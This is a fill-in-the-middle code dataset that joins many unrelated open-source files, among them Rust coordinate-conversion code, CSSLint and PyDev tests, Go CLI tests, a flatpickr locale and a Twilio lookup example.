}
/***************************************************************************************************
* Screen Coords - the coordinate system to actually draw in.
* ************************************************************************************************/
/// On screen coordinates. Meant to scale and translate `XYCoords` to fit on the screen.
/// Origin lower left, (x,y).
/// When drawing using cairo functions, use these coordinates.
#[derive(Clone, Copy, Debug)]
pub struct ScreenCoords {
pub x: f64,
pub y: f64,
}
impl ScreenCoords {
pub fn origin() -> Self {
ScreenCoords { x: 0.0, y: 0.0 }
}
}
#[derive(Clone, Copy, Debug)]
pub struct ScreenRect {
pub lower_left: ScreenCoords,
pub upper_right: ScreenCoords,
}
impl ScreenRect {
pub fn add_padding(&self, padding: f64) -> ScreenRect {
ScreenRect {
lower_left: ScreenCoords {
x: self.lower_left.x - padding,
y: self.lower_left.y - padding,
},
upper_right: ScreenCoords {
x: self.upper_right.x + padding,
y: self.upper_right.y + padding,
},
}
}
pub fn expand_to_fit(&mut self, point: ScreenCoords) {
let ScreenCoords { x, y } = point;
if x < self.lower_left.x {
self.lower_left.x = x;
}
if x > self.upper_right.x {
self.upper_right.x = x;
}
if y < self.lower_left.y {
self.lower_left.y = y;
}
if y > self.upper_right.y {
self.upper_right.y = y;
}
}
}
impl Rect for ScreenRect {
fn min_x(&self) -> f64 {
self.lower_left.x
}
fn max_x(&self) -> f64 {
self.upper_right.x
}
fn min_y(&self) -> f64 {
self.lower_left.y
}
fn max_y(&self) -> f64 {
self.upper_right.y
}
}
/***************************************************************************************************
* Device Coords - the coordinate system of the device
* ************************************************************************************************/
/// Device coordinates (pixels positions).
/// Origin upper left, (Column, Row)
#[derive(Clone, Copy, Debug, PartialEq)]
pub struct DeviceCoords {
pub col: f64,
pub row: f64,
}
impl From<(f64, f64)> for DeviceCoords {
fn from(src: (f64, f64)) -> Self {
DeviceCoords {
col: src.0,
row: src.1,
}
}
}
#[derive(Clone, Copy, Debug)]
pub struct DeviceRect {
pub upper_left: DeviceCoords,
pub width: f64,
pub height: f64,
}
impl Rect for DeviceRect {
fn min_x(&self) -> f64 {
self.upper_left.col
}
fn max_x(&self) -> f64 {
self.upper_left.col + self.width
}
fn min_y(&self) -> f64 {
self.upper_left.row
}
fn max_y(&self) -> f64 {
self.upper_left.row + self.height
}
}
/***************************************************************************************************
* Converting Pressure to the y coordinate
* ************************************************************************************************/
/// Given a pressure value, convert it to a y-value from X-Y coordinates.
///
/// Overwhelmingly the vertical coordinate system is based on pressure, so this is a very common
/// operation to do, and you want it to always be done the same way.
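/// The mapping is logarithmic: y = log10(MAXP / p) / log10(MAXP / MINP), so y runs from
/// 0.0 at `config::MAXP` up to 1.0 at `config::MINP`.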
pub fn convert_pressure_to_y(pressure: HectoPascal) -> f64 {
(config::MAXP / pressure).log10() / (config::MAXP / config::MINP).log10()
}
/// Provide an inverse function as well.
pub fn convert_y_to_pressure(y: f64) -> HectoPascal {
config::MAXP * (config::MINP / config::MAXP).powf(y)
}
#[test]
fn test_pressure_to_y_and_back() {
use metfor::Quantity;
for i in 100..=1000 {
let p = HectoPascal(i as f64);
let y = convert_pressure_to_y(p);
let pback = convert_y_to_pressure(y);
println!("p = {:?} y = {:?} pback = {:?}", p, y, pback);
assert!((p - pback).abs() < HectoPascal(1.0e-6));
}
}<|fim▁end|> | |
<|file_name|>emojify.js<|end_file_name|><|fim▁begin|>'use strict';
<|fim▁hole|>
var generateEmoji = function(selector) {
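    // Hand out emojis in list order, one per new selector; a selector seen before keeps its emoji.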
if (!existingRules[selector]) {
existingRules[selector] = emojiArr[i];
        if (i !== emojiArr.length - 1) {
i++
} else {
i = 0;
}
}
return existingRules[selector];
}
module.exports = generateEmoji;<|fim▁end|> | var emojiArr = require('./emojis');
var i = 0;
var existingRules = {}; |
<|file_name|>0003_auto_20160525_1521.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('predict', '0002_auto_20160524_0947'),
]
operations = [
migrations.RemoveField(
model_name='predictdataset',
name='dropbox_url',
),
migrations.AlterField(
model_name='predictdataset',
name='file_type',
field=models.CharField(max_length=25, choices=[(b'vcf', b'Variant Call Format (VCF)'), (b'fastq', b'FastQ Nucleotide Sequence'), (b'manual', b'Mutations Manual Entry')]),
),
migrations.AlterField(
model_name='predictdataset',
name='title',
field=models.CharField(max_length=255, verbose_name=b'Dataset Title'),
),
]<|fim▁end|> | |
<|file_name|>sl.js<|end_file_name|><|fim▁begin|>/* Slovenian locals for flatpickr */
var flatpickr = flatpickr || { l10ns: {} };
flatpickr.l10ns.sl = {};
flatpickr.l10ns.sl.weekdays = {
shorthand: ["Ned", "Pon", "Tor", "Sre", "Čet", "Pet", "Sob"],
longhand: ["Nedelja", "Ponedeljek", "Torek", "Sreda", "Četrtek", "Petek", "Sobota"]
};
flatpickr.l10ns.sl.months = {
shorthand: ["Jan", "Feb", "Mar", "Apr", "Maj", "Jun", "Jul", "Avg", "Sep", "Okt", "Nov", "Dec"],
longhand: ["Januar", "Februar", "Marec", "April", "Maj", "Junij", "Julij", "Avgust", "September", "Oktober", "November", "December"]
};
flatpickr.l10ns.sl.firstDayOfWeek = 1;<|fim▁hole|>flatpickr.l10ns.sl.ordinal = function () {
return ".";
};
if (typeof module !== "undefined") module.exports = flatpickr.l10ns;<|fim▁end|> | flatpickr.l10ns.sl.rangeSeparator = " do "; |
<|file_name|>all-rules.js<|end_file_name|><|fim▁begin|>/*
* This file contains generic tests that are run against every rule. Early on,
* we found some common rule patterns that would cause errors under certain
* conditions. Instead of tracking them down individually, this file runs
* the same tests on every defined rule to track down these patterns.
*
* When run in addition to the other tests, this causes the Rhino CLI test
 * to fail due to Java stack overflow. This must be run separately from the other tests.
*/
(function() {
"use strict";
var Assert = YUITest.Assert,
suite = new YUITest.TestSuite("General Tests for all Rules"),
rules = CSSLint.getRules(),
len = rules.length,
i;
function testAll(i, rules) {
suite.add(new YUITest.TestCase({
name: "General Tests for " + rules[i].id,
setUp: function() {
this.options = {};
this.options[rules[i].id] = 1;
},
"Using @viewport should not result in an error": function() {
var result = CSSLint.verify("@viewport { width: auto; }", this.options);
Assert.areEqual(0, result.messages.length);
},
"Using @keyframes should not result in an error": function() {
var result = CSSLint.verify("@keyframes resize { 0% {padding: 0;} 50% {padding: 0;} 100% {padding: 0;}}", this.options);
Assert.areEqual(0, result.messages.length);
},
"Using @page should not result in an error": function() {<|fim▁hole|> Assert.areEqual(0, result.messages.length);
},
"Using @page @top-left should not result in an error": function() {
var result = CSSLint.verify("@page { @top-left { content: ''; } }", this.options);
Assert.areEqual(0, result.messages.length);
},
"Using a regular rule should not result in an error": function() {
var result = CSSLint.verify("body { margin: 0; }", this.options);
Assert.areEqual(0, result.messages.length);
}
}));
}
for (i = 0; i < len; i++) {
testAll(i, rules);
}
YUITest.TestRunner.add(suite);
})();<|fim▁end|> | var result = CSSLint.verify("@page { width: 100px; }", this.options); |
<|file_name|>value.py<|end_file_name|><|fim▁begin|>def represents_int(value):
try:
int(value)<|fim▁hole|>
return False
def bytes_to_gib(byte_value, round_digits=2):
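    # 1 GiB = 1024 ** 3 bytes; float() keeps the division from truncating on Python 2.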
return round(byte_value / 1024 / 1024 / float(1024), round_digits)
def count_to_millions(count_value, round_digits=3):
return round(count_value / float(1000000), round_digits)<|fim▁end|> | return True
except ValueError: |
<|file_name|>test_feature_version.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
import mc_unittest
from rogerthat.bizz.profile import create_user_profile
from rogerthat.bizz.system import update_app_asset_response
from rogerthat.capi.system import updateAppAsset
from rogerthat.dal.mobile import get_mobile_settings_cached
from rogerthat.models.properties.profiles import MobileDetails
from rogerthat.rpc import users
from rogerthat.rpc.models import Mobile
from rogerthat.rpc.rpc import logError
from rogerthat.to.app import UpdateAppAssetRequestTO
class Test(mc_unittest.TestCase):
    def testUpdateAppAsset(self):
self.set_datastore_hr_probability(1)
scale_x = 1
request = UpdateAppAssetRequestTO(u"kind", u"url", scale_x)
app_user = users.User('[email protected]')
user_profile = create_user_profile(app_user, 'geert', language='en')
mobile = users.get_current_mobile()
user_profile.mobiles = MobileDetails()
user_profile.mobiles.addNew(mobile.account, Mobile.TYPE_ANDROID_HTTP, None, u"rogerthat")
user_profile.put()
ms = get_mobile_settings_cached(mobile)
ms.majorVersion = 0
ms.minorVersion = 2447
ms.put()
updateAppAsset(update_app_asset_response, logError, app_user, request=request)
ms.minorVersion = 2449
ms.put()
<|fim▁hole|><|fim▁end|> | updateAppAsset(update_app_asset_response, logError, app_user, request=request) |
<|file_name|>issue-57180.rs<|end_file_name|><|fim▁begin|>// compile-flags: -Cmetadata=aux
pub trait Trait {
}
pub struct Struct<F>
{
_p: ::std::marker::PhantomData<F>,
}
<|fim▁hole|> F: Fn() -> u32,
{
}<|fim▁end|> | impl<F: Fn() -> u32>
Trait for Struct<F>
where |
<|file_name|>CompletionParticipantTest.java<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2005-2013 by Appcelerator, Inc. All Rights Reserved.
* Licensed under the terms of the Eclipse Public License (EPL).
* Please see the license.txt included with this distribution for details.
* Any modifications to this file must keep this entire header intact.
*/
/*
* Created on 25/08/2005
*
* @author Fabio Zadrozny
*/
package com.python.pydev.codecompletion.participant;
import java.io.File;
import org.eclipse.core.runtime.preferences.IEclipsePreferences;
import org.eclipse.jface.text.Document;
import org.python.pydev.ast.codecompletion.PyCodeCompletion;
import org.python.pydev.ast.codecompletion.PyCodeCompletionPreferences;
import org.python.pydev.ast.codecompletion.revisited.modules.SourceToken;
import org.python.pydev.core.IToken;
import org.python.pydev.core.TestDependent;
import org.python.pydev.core.TokensList;
import org.python.pydev.core.proposals.CompletionProposalFactory;
import org.python.pydev.editor.actions.PySelectionTest;
import org.python.pydev.editor.codecompletion.proposals.CtxInsensitiveImportComplProposal;
import org.python.pydev.editor.codecompletion.proposals.DefaultCompletionProposalFactory;
import org.python.pydev.parser.jython.ast.Import;
import org.python.pydev.parser.jython.ast.NameTok;
import org.python.pydev.parser.jython.ast.aliasType;
import org.python.pydev.shared_core.code_completion.ICompletionProposalHandle;
import org.python.pydev.shared_core.preferences.InMemoryEclipsePreferences;
import com.python.pydev.analysis.AnalysisPreferences;
import com.python.pydev.analysis.additionalinfo.AdditionalInfoTestsBase;
import com.python.pydev.codecompletion.ctxinsensitive.CtxParticipant;
public class CompletionParticipantTest extends AdditionalInfoTestsBase {
public static void main(String[] args) {
CompletionParticipantTest test = new CompletionParticipantTest();
try {
test.setUp();
test.testImportCompletionFromZip();
test.tearDown();
junit.textui.TestRunner.run(CompletionParticipantTest.class);
} catch (Throwable e) {
e.printStackTrace();
}
}
@Override
public void setUp() throws Exception {
// forceAdditionalInfoRecreation = true; -- just for testing purposes
super.setUp();
codeCompletion = new PyCodeCompletion();
CompletionProposalFactory.set(new DefaultCompletionProposalFactory());
}
@Override
public void tearDown() throws Exception {
super.tearDown();
PyCodeCompletionPreferences.getPreferencesForTests = null;
CompletionProposalFactory.set(null);
}
@Override
protected String getSystemPythonpathPaths() {
return TestDependent.getCompletePythonLib(true, isPython3Test()) + "|" + TestDependent.TEST_PYSRC_TESTING_LOC
+ "myzipmodule.zip"
+ "|"
+ TestDependent.TEST_PYSRC_TESTING_LOC + "myeggmodule.egg";
}
public void testImportCompletion() throws Exception {
participant = new ImportsCompletionParticipant();
//check simple
ICompletionProposalHandle[] proposals = requestCompl(
"unittest", -1, -1, new String[] { "unittest", "unittest - testlib" }); //the unittest module and testlib.unittest
Document document = new Document("unittest");
ICompletionProposalHandle p0 = null;
ICompletionProposalHandle p1 = null;
for (ICompletionProposalHandle p : proposals) {
String displayString = p.getDisplayString();
if (displayString.equals("unittest")) {
p0 = p;
} else if (displayString.equals("unittest - testlib")) {
p1 = p;
}
}
if (p0 == null) {
fail("Could not find unittest import");
}
if (p1 == null) {
fail("Could not find unittest - testlib import");
}
((CtxInsensitiveImportComplProposal) p0).indentString = " ";
((CtxInsensitiveImportComplProposal) p0).apply(document, ' ', 0, 8);
PySelectionTest.checkStrEquals("import unittest\r\nunittest", document.get());
document = new Document("unittest");
((CtxInsensitiveImportComplProposal) p1).indentString = " ";
((CtxInsensitiveImportComplProposal) p1).apply(document, ' ', 0, 8);
PySelectionTest.checkStrEquals("from testlib import unittest\r\nunittest", document.get());
document = new Document("unittest");
final IEclipsePreferences prefs = new InMemoryEclipsePreferences();
PyCodeCompletionPreferences.getPreferencesForTests = () -> prefs;
document = new Document("unittest");
prefs.putBoolean(PyCodeCompletionPreferences.APPLY_COMPLETION_ON_DOT, false);
((CtxInsensitiveImportComplProposal) p1).indentString = " ";
((CtxInsensitiveImportComplProposal) p1).apply(document, '.', 0, 8);
PySelectionTest.checkStrEquals("unittest.", document.get());
document = new Document("unittest");
prefs.putBoolean(PyCodeCompletionPreferences.APPLY_COMPLETION_ON_DOT, true);
((CtxInsensitiveImportComplProposal) p1).indentString = " ";
((CtxInsensitiveImportComplProposal) p1).apply(document, '.', 0, 8);
PySelectionTest.checkStrEquals("from testlib import unittest\r\nunittest.", document.get());
//for imports, the behavior never changes
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = true;
try {
proposals = requestCompl("_priv3", new String[] { "_priv3 - relative.rel1._priv1._priv2" });
document = new Document("_priv3");
((CtxInsensitiveImportComplProposal) proposals[0]).indentString = " ";
((CtxInsensitiveImportComplProposal) proposals[0]).apply(document, ' ', 0, 6);
PySelectionTest.checkStrEquals("from relative.rel1._priv1._priv2 import _priv3\r\n_priv3", document.get());
} finally {
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = false;
}
//check on actual file
requestCompl(new File(TestDependent.TEST_PYSRC_TESTING_LOC + "/testlib/unittest/guitestcase.py"), "guite", -1,
0,<|fim▁hole|> null) });
this.imports = new TokensList(new IToken[] { new SourceToken(importTok, "unittest", "", "", "", null) });
requestCompl("import unittest\nunittest", new String[] {}); //none because the import for unittest is already there
requestCompl("import unittest\nunittes", new String[] {}); //the local import for unittest (won't actually show anything because we're only exercising the participant test)
this.imports = null;
}
public void testImportCompletionFromZip2() throws Exception {
participant = new ImportsCompletionParticipant();
ICompletionProposalHandle[] proposals = requestCompl("myzip", -1, -1, new String[] {});
assertContains("myzipfile - myzipmodule", proposals);
assertContains("myzipmodule", proposals);
proposals = requestCompl("myegg", -1, -1, new String[] {});
assertContains("myeggfile - myeggmodule", proposals);
assertContains("myeggmodule", proposals);
}
public void testImportCompletionFromZip() throws Exception {
participant = new CtxParticipant();
ICompletionProposalHandle[] proposals = requestCompl("myzipc", -1, -1, new String[] {});
assertContains("MyZipClass - myzipmodule.myzipfile", proposals);
proposals = requestCompl("myegg", -1, -1, new String[] {});
assertContains("MyEggClass - myeggmodule.myeggfile", proposals);
}
public void testImportCompletion2() throws Exception {
participant = new CtxParticipant();
ICompletionProposalHandle[] proposals = requestCompl("xml", -1, -1, new String[] {});
assertNotContains("xml - xmlrpclib", proposals);
requestCompl(new File(TestDependent.TEST_PYSRC_TESTING_LOC + "/testlib/unittest/guitestcase.py"), "guite", -1,
0,
new String[] {});
//the behavior changes for tokens on modules
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = true;
try {
proposals = requestCompl("Priv3", new String[] { "Priv3 - relative.rel1._priv1._priv2._priv3" });
Document document = new Document("Priv3");
((CtxInsensitiveImportComplProposal) proposals[0]).indentString = " ";
((CtxInsensitiveImportComplProposal) proposals[0]).apply(document, ' ', 0, 5);
PySelectionTest.checkStrEquals("from relative.rel1 import Priv3\r\nPriv3", document.get());
} finally {
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = false;
}
}
}<|fim▁end|> | new String[] {});
Import importTok = new Import(new aliasType[] { new aliasType(new NameTok("unittest", NameTok.ImportModule), |
<|file_name|>boot.js<|end_file_name|><|fim▁begin|>import test from 'ava';
import { spawn } from 'child_process';
test.cb('app should boot without exiting', (t) => {
const cli = spawn('node', [ './cli' ]);
cli.stderr.on('data', (param) => {
console.log(param.toString());
});
cli.on('close', (code) => {
t.fail(`app failed to boot ${code}`);
});
<|fim▁hole|> setTimeout(() => {
t.pass();
t.end();
        cli.removeAllListeners('close'); // kill() fires 'close'; detach so it cannot fail a passed test
        cli.kill();
}, 500);
});<|fim▁end|> | |
<|file_name|>custom_user_data_test.go<|end_file_name|><|fim▁begin|>package instance
import (
"io/ioutil"
"os"
"testing"
"github.com/scaleway/scaleway-cli/internal/core"
)
func Test_UserDataGet(t *testing.T) {
t.Run("Get an existing key", core.Test(&core.TestConfig{
BeforeFunc: core.BeforeFuncCombine(
createServer("Server"),
core.ExecBeforeCmd("scw instance user-data set server-id={{.Server.ID}} key=happy content=true"),
),
Commands: GetCommands(),
Cmd: "scw instance user-data get server-id={{.Server.ID}} key=happy",
AfterFunc: deleteServer("Server"),
Check: core.TestCheckCombine(
core.TestCheckGolden(),
core.TestCheckExitCode(0),
),
}))
t.Run("Get an nonexistent key", core.Test(&core.TestConfig{
BeforeFunc: createServer("Server"),
Commands: GetCommands(),
Cmd: "scw instance user-data get server-id={{.Server.ID}} key=happy",
AfterFunc: deleteServer("Server"),
Check: core.TestCheckCombine(
core.TestCheckGolden(),
core.TestCheckExitCode(1),
),
}))
}
func Test_UserDataList(t *testing.T) {
t.Run("Simple", core.Test(&core.TestConfig{
BeforeFunc: core.BeforeFuncCombine(
createServer("Server"),
core.ExecBeforeCmd("scw instance user-data set server-id={{ .Server.ID }} key=foo content=bar"),
core.ExecBeforeCmd("scw instance user-data set server-id={{ .Server.ID }} key=bar content=foo"),
),
Commands: GetCommands(),
Cmd: "scw instance user-data list server-id={{ .Server.ID }}",
AfterFunc: deleteServer("Server"),
Check: core.TestCheckCombine(
core.TestCheckGolden(),
core.TestCheckExitCode(0),
),
}))
}
func Test_UserDataFileUpload(t *testing.T) {
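	// exercises the content=@<path> syntax for uploading user-data from a local file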
content := "cloud-init file content"
t.Run("on-cloud-init", core.Test(&core.TestConfig{
Commands: GetCommands(),
BeforeFunc: core.BeforeFuncCombine(
core.ExecStoreBeforeCmd("Server", "scw instance server create stopped=true image=ubuntu-bionic"),
func(ctx *core.BeforeFuncCtx) error {
file, _ := ioutil.TempFile("", "test")
_, _ = file.WriteString(content)
ctx.Meta["filePath"] = file.Name()
return nil
},
),
Cmd: `scw instance user-data set key=cloud-init server-id={{ .Server.ID }} content=@{{ .filePath }}`,
Check: core.TestCheckCombine(
core.TestCheckGolden(),
),
AfterFunc: core.AfterFuncCombine(
func(ctx *core.AfterFuncCtx) error {
_ = os.RemoveAll(ctx.Meta["filePath"].(string))
return nil
},
),
}))<|fim▁hole|> Commands: GetCommands(),
BeforeFunc: core.BeforeFuncCombine(
core.ExecStoreBeforeCmd("Server", "scw instance server create stopped=true image=ubuntu-bionic"),
func(ctx *core.BeforeFuncCtx) error {
file, _ := ioutil.TempFile("", "test")
_, _ = file.WriteString(content)
ctx.Meta["filePath"] = file.Name()
return nil
},
),
Cmd: `scw instance user-data set key=foobar server-id={{ .Server.ID }} content=@{{ .filePath }}`,
Check: core.TestCheckCombine(
core.TestCheckGolden(),
),
AfterFunc: core.AfterFuncCombine(
func(ctx *core.AfterFuncCtx) error {
_ = os.RemoveAll(ctx.Meta["filePath"].(string))
return nil
},
),
}))
}<|fim▁end|> |
t.Run("on-random-key", core.Test(&core.TestConfig{ |
<|file_name|>TooltipDemo.js<|end_file_name|><|fim▁begin|>/**
* @license
* Copyright 2014 Google Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
CLASS({
name: 'TooltipDemo',
package: 'foam.ui.polymer.demo',
extends: 'foam.ui.View',
requires: [
'foam.ui.polymer.demo.ElementWithTooltip',
'foam.ui.polymer.Tooltip'
],
properties: [
{
type: 'String',
name: 'right',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Right'
},
{
type: 'String',
name: 'top',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Top'
},
{<|fim▁hole|> name: 'left',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Left'
},
{
type: 'String',
name: 'bottom',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Bottom'
},
{
type: 'String',
name: 'noArrow',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'NoArrow'
},
{
type: 'String',
name: 'richText',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'RichText'
},
{
type: 'String',
name: 'show',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Show'
}
],
templates: [
function toHTML() {/*
<div class="centeredDiv">
$$top{ tooltipConfig: {
text: 'Tooltip on the top',
position: 'top'
} }
</div><div class="centeredDiv">
$$left{ tooltipConfig: {
text: 'Tooltip on the left',
position: 'left'
} }
</div><div class="centeredDiv">
$$right{ tooltipConfig: {
text: 'Tooltip on the right',
position: 'right'
} }
</div><div class="centeredDiv">
$$bottom{ tooltipConfig: {
text: 'Tooltip on the bottom',
position: 'bottom'
} }
</div><div class="centeredDiv">
$$noArrow{ tooltipConfig: {
text: 'Tooltip without arrow',
noarrow: true
} }
</div><div class="centeredDiv">
$$richText{ tooltipConfig: {
html: 'Tooltip with <b>rich</b> <i>text</i>'
} }
</div><div class="centeredDiv">
$$show{ tooltipConfig: {
text: 'Tooltip always shown',
show: true
} }
</div>
*/},
function CSS() {/*
.centeredDiv { cursor: pointer; width: 0; margin: 0 auto; }
*/}
]
});<|fim▁end|> | type: 'String', |
<|file_name|>test_recaptcha.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""Copyright (C) 2013 COLDWELL AG
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import loader
loader.init()
import gevent
import requests
from client import interface, event
from client.captcha import recaptcha
def send_input(e, input):
gevent.spawn_later(0.1, interface.call, 'input', 'answer', id=input.id, answer={'captcha': 'invalid test recaptcha answer'})
def test_recaptcha():
browser = requests.session()
resp = browser.get("http://www.google.com/recaptcha/demo/")
challenge_id = recaptcha.parse(resp.text)
result, challenge = recaptcha.solve(browser, challenge_id)
<|fim▁hole|> try:
assert "Correct" in resp.text or "Incorrect" in resp.text or "Richtig" in resp.text or "Falsch" in resp.text or "Rangt." in resp.text or u"Rétt!" in resp.text or u"Feil." in resp.text or u"Fel." in resp.text
except:
print resp.text
raise
test_recaptcha.setUp = lambda: event.add("input:request", send_input)
test_recaptcha.tearDown = lambda: event.remove('input:request', send_input)
if __name__ == '__main__':
test_recaptcha()<|fim▁end|> | data = {"recaptcha_challenge_field": challenge, "recaptcha_response_field": result}
resp = browser.post("http://www.google.com/recaptcha/demo/", data=data)
|
<|file_name|>dynamic-form-question.component.ts<|end_file_name|><|fim▁begin|>// #docregion
import { Component, Input } from '@angular/core';
import { ControlGroup } from '@angular/common';
import { QuestionBase } from './question-base';
@Component({
selector: 'df-question',
templateUrl: 'app/dynamic-form-question.component.html'
})<|fim▁hole|> get isValid() { return this.form.controls[this.question.key].valid; }
}<|fim▁end|> | export class DynamicFormQuestionComponent {
@Input() question: QuestionBase<any>;
@Input() form: ControlGroup; |
<|file_name|>lookup-get-basic-example-1.6.x.py<|end_file_name|><|fim▁begin|># Download the Python helper library from twilio.com/docs/python/install
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
account_sid = "ACCOUNT_SID"
auth_token = "your_auth_token"
client = Client(account_sid, auth_token)
number = client.lookups.phone_numbers("+15108675309").fetch(type="carrier")<|fim▁hole|><|fim▁end|> |
print(number.carrier['type'])
print(number.carrier['name']) |
<|file_name|>gen-dq-textbox.go<|end_file_name|><|fim▁begin|>// old skool dw textbox:
// gen-dq-textbox dw.png
<|fim▁hole|>// gen-dq-textbox -bg "rgb(100,100,200)" -xbg "rgb(0,0,0)" -mbg 0.125 ff.png
package main
import (
"flag"
"fmt"
"image"
"image/color"
"log"
"math"
"os"
"github.com/qeedquan/go-media/image/chroma"
"github.com/qeedquan/go-media/image/imageutil"
)
var flags struct {
Width int
Height int
Thickness int
MFG, MBG float64
FG, XFG color.RGBA
BG, XBG color.RGBA
}
func main() {
log.SetFlags(0)
log.SetPrefix("gen-dq-textbox: ")
parseFlags()
m := gen(flags.Width, flags.Height, flags.Thickness, flags.FG, flags.BG,
flags.XFG, flags.XBG, flags.MFG, flags.MBG)
err := imageutil.WriteRGBAFile(flag.Arg(0), m)
ck(err)
}
func ck(err error) {
if err != nil {
log.Fatal(err)
}
}
func parseFlags() {
var dim, fg, bg, xfg, xbg string
flag.StringVar(&dim, "d", "1024x128", "image dimension")
flag.StringVar(&fg, "fg", "#ffffff", "foreground color")
flag.StringVar(&bg, "bg", "#000000", "backround color")
flag.StringVar(&xfg, "xfg", "", "foreground color gradient")
flag.StringVar(&xbg, "xbg", "", "background color gradient")
flag.IntVar(&flags.Thickness, "t", 8, "thickness")
flag.Float64Var(&flags.MFG, "mfg", 0, "multiple step size for foreground linear gradient")
flag.Float64Var(&flags.MBG, "mbg", 0, "multiple step size for background linear gradient")
flag.Usage = usage
flag.Parse()
if flag.NArg() < 1 {
usage()
}
fmt.Sscanf(dim, "%dx%d", &flags.Width, &flags.Height)
flags.FG = parseRGBA(fg)
flags.BG = parseRGBA(bg)
flags.XFG = flags.FG
flags.XBG = flags.BG
if xfg != "" {
flags.XFG = parseRGBA(xfg)
}
if xbg != "" {
flags.XBG = parseRGBA(xbg)
}
if flags.MFG == 0 {
flags.MFG = 1.0 / float64(flags.Thickness)
}
if flags.MBG == 0 {
flags.MBG = 1.0 / float64(flags.Height)
}
}
func parseRGBA(s string) color.RGBA {
c, err := chroma.ParseRGBA(s)
ck(err)
return c
}
func usage() {
fmt.Fprintln(os.Stderr, "usage: gen-dq-textbox [options] output")
flag.PrintDefaults()
os.Exit(2)
}
func gen(w, h int, thickness int, fg, bg, xfg, xbg color.RGBA, mfg, mbg float64) *image.RGBA {
r := image.Rect(0, 0, w, h)
m := image.NewRGBA(r)
// bg
for y := r.Min.Y; y < r.Max.Y; y++ {
for x := r.Min.X; x < r.Max.X; x++ {
t := float64(y-r.Min.Y) / float64(r.Max.Y-r.Min.Y)
t = multiple(t, mbg)
c := mix(bg, xbg, t)
m.Set(x, y, c)
}
}
// border
s := r.Inset(8)
for x := s.Min.X; x < s.Max.X; x++ {
for y := 0; y < thickness; y++ {
t := float64(y) / float64(thickness)
t = multiple(t, mfg)
c := mix(fg, xfg, t)
m.Set(x, s.Min.Y+y, c)
m.Set(x, s.Max.Y-y-1, c)
}
}
for y := s.Min.Y; y < s.Max.Y; y++ {
for x := 0; x < thickness; x++ {
t := float64(x) / float64(thickness)
t = multiple(t, mfg)
c := mix(fg, xfg, t)
m.Set(s.Min.X+x, y, c)
m.Set(s.Max.X-x-1, y, c)
}
}
// round
n := thickness * 3 / 4
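	// overwrite the outer corner pixels with the background gradient and fill the
	// inner corner pixels with the border color to approximate rounded corners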
for y := 0; y < n; y++ {
for x := 0; x < n; x++ {
t := float64(s.Min.Y+y-s.Min.Y) / float64(s.Max.Y-s.Min.Y)
t = multiple(t, mbg)
bg1 := mix(bg, xbg, t)
t = float64(s.Max.Y-y-s.Min.Y) / float64(s.Max.Y-s.Min.Y)
t = multiple(t, mbg)
bg2 := mix(bg, xbg, t)
m.Set(s.Min.X+x, s.Min.Y+y, bg1)
m.Set(s.Min.X+x+thickness, s.Min.Y+y+thickness, fg)
m.Set(s.Max.X-x, s.Min.Y+y, bg1)
m.Set(s.Max.X-x-thickness, s.Min.Y+y+thickness, fg)
m.Set(s.Min.X+x, s.Max.Y-y, bg2)
m.Set(s.Min.X+x+thickness, s.Max.Y-y-thickness, fg)
m.Set(s.Max.X-x, s.Max.Y-y, bg2)
m.Set(s.Max.X-x-thickness, s.Max.Y-y-thickness, fg)
}
}
return m
}
func mix(a, b color.RGBA, t float64) color.RGBA {
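	// linear interpolation between colors a and b by t in [0, 1]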
return color.RGBA{
uint8(float64(a.R)*(1-t) + t*float64(b.R)),
uint8(float64(a.G)*(1-t) + t*float64(b.G)),
uint8(float64(a.B)*(1-t) + t*float64(b.B)),
uint8(float64(a.A)*(1-t) + t*float64(b.A)),
}
}
func multiple(a, m float64) float64 {
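	// round a up to the nearest multiple of m; quantizing t like this turns
	// the smooth gradient into visible bands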
return math.Ceil(a/m) * m
}<|fim▁end|> | // old skool ff textbox:
|
<|file_name|>grid.py<|end_file_name|><|fim▁begin|>import bisect
import string
from abc import ABC, abstractmethod
from typing import Optional
from django.conf import settings
class AbstractGrid(ABC):
enabled = False
@abstractmethod
